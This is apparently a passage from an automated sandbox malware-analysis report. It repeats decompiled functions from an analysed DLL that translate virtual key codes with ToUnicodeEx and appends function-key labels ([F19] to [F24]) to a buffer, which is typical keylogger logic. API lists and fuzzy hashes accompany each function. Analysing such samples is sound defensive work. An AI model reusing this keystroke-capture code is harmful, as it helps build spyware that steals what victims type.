                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F19]
                  • API String ID: 783433895-3288517287
                  • Opcode ID: fdf93db7dfc6a872f4b4257a607c2791a5697a33a6d87c52e9f2c4f7bf3239d7
                  • Instruction ID: c1d88a8a83b3fff2f0a92d393676b3d9be71f05b44633e1edb0896168ba610e4
                  • Opcode Fuzzy Hash: fdf93db7dfc6a872f4b4257a607c2791a5697a33a6d87c52e9f2c4f7bf3239d7
                  • Instruction Fuzzy Hash: 6F31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007453(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F2]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F2]
                  • API String ID: 783433895-219715840
                  • Opcode ID: bc4e0beed6f5971c97352df3017e66fb88d969414a5b5ea74617967ef4fb9ef4
                  • Instruction ID: b16667c500a8f6aee4ba6b3ba7482377eae1e2be3dd1480aee087fcb1cdc840b
                  • Opcode Fuzzy Hash: bc4e0beed6f5971c97352df3017e66fb88d969414a5b5ea74617967ef4fb9ef4
                  • Instruction Fuzzy Hash: D931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007464(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F20]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F20]
                  • API String ID: 783433895-394710967
                  • Opcode ID: 6d471ac1e053abb11c3b1d7b11cba9aa75bbbea4d48d7b348b99f179170ee903
                  • Instruction ID: a680e9b239fa0aebbd035ce6a985e10c990f55e2f26307f0e1286ccc6e1c0c6e
                  • Opcode Fuzzy Hash: 6d471ac1e053abb11c3b1d7b11cba9aa75bbbea4d48d7b348b99f179170ee903
                  • Instruction Fuzzy Hash: D331C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007475(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F21]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F21]
                  • API String ID: 783433895-245235446
                  • Opcode ID: a583e5d24fb749a61087f2418aa3365330e5370283494b596e987e39d4a65dac
                  • Instruction ID: 510fef3e6fa0df149ae542c76aa25a181dcf5755431cbbb85e5b1cc66d8b058e
                  • Opcode Fuzzy Hash: a583e5d24fb749a61087f2418aa3365330e5370283494b596e987e39d4a65dac
                  • Instruction Fuzzy Hash: A131BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007486(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F22]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F22]
                  • API String ID: 783433895-632335669
                  • Opcode ID: 538fe9a1677a7cf68954d1a7aa096ae76dd59aeb88e8845f61bacfcf84bd100c
                  • Instruction ID: 90321dbe446a42362a2d965519f54d3763325675bd58b520da20de7a1a4fc573
                  • Opcode Fuzzy Hash: 538fe9a1677a7cf68954d1a7aa096ae76dd59aeb88e8845f61bacfcf84bd100c
                  • Instruction Fuzzy Hash: 0931C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007497(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F23]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F23]
                  • API String ID: 783433895-1017879668
                  • Opcode ID: ef35aa9342167d40ef5d6cda57461785793fe1f05099ee63a642656f0a901aee
                  • Instruction ID: 28673ba874af58d34bd6c2be020580e78fa885bb135c4682ba041cb78c112e65
                  • Opcode Fuzzy Hash: ef35aa9342167d40ef5d6cda57461785793fe1f05099ee63a642656f0a901aee
                  • Instruction Fuzzy Hash: 3631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074A8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F24]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
